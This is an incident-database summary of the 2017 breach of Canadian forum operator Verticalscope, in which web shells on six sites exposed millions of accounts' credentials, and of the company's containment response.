Cyber Incident Victim: Verticalscope
Date:
Nov 2017
Location:
Canada
Summary
A Canadian online forum operator experienced a second security compromise, impacting millions of user accounts across multiple platforms. Attackers infiltrated six websites, deploying web shells that enabled remote administration and unauthorized database access, exposing credentials, email addresses, and IP addresses. The intrusion was identified after hackers advertised access to the compromised systems to promote a paid breach data search service. The company responded by removing malicious files, expiring affected user passwords, enhancing detection mechanisms, and restricting access. Impacted forums included automotive and hobbyist communities, with evidence suggesting connections to previous breaches involving similar credential-selling platforms. This recurrence highlighted persistent vulnerabilities despite prior incidents, though the organization implemented containment measures upon discovery.
| CIA Posture | Motives | Tactics, Techniques & Procedures |
|---|---|---|
| Available to members | 2 motives | 1 technique |
| Threat Actors | Type | Location |
|---|---|---|
| 0 actors | Available to members | Available to members |
Description
Verticalscope, a Canadian company managing hundreds of web discussion forums, experienced its second significant security breach in approximately two years, with evidence of the intrusion surfacing around November 2, 2017. Security researcher Alex Holden of Hold Security identified hackers actively selling access to Verticalscope.com and its affiliated sites, initially suspecting a resale of data from the 2016 breach that exposed 45 million accounts. Further investigation revealed fresh compromises, as hackers provided screenshots demonstrating active web shells—malicious backdoors enabling remote administration—on Verticalscope.com and Toyotanation.com, a high-traffic automotive forum. The attackers inadvertently exposed critical details in these screenshots, allowing Holden to locate at least two backdoors. Verticalscope confirmed unauthorized access to six websites, attributing it to file-level intrusions. The company responded by removing compromised file managers, expiring all passwords on affected sites, adding malicious file patterns to detection tools, and implementing additional access restrictions. Impacted forums included Toyotanation.com, Jeepforum.com (Verticalscope’s second-largest site), and watchuseek.com, though the full scope remained unclear beyond the confirmed 2.7 million user accounts.
The breach’s aftermath revealed commercial motives, as attackers leveraged the incident to promote LuiDB, a paid service resembling the defunct Leakedsource.com, which historically sold breached credentials. LuiDB offered search capabilities for compromised credentials—including usernames, passwords, emails, and IP addresses—with subscription fees ranging from $5 to $400 in Bitcoin. This mirrored Verticalscope’s 2016 breach, where Leakedsource had publicly exposed user data. Forensic analysis linked the intrusion to Pastebin posts advertising LuiDB, though these were later deleted. Verticalscope’s statement emphasized containment efforts but did not disclose whether user data was exfiltrated or the duration of unauthorized access. The incident underscored risks associated with password reuse across forums and other services, though the narrative did not confirm specific victim impacts beyond credential exposure. Verticalscope’s corrective actions focused on technical containment without addressing broader security enhancements like multi-factor authentication, which remained uncommon across its forums.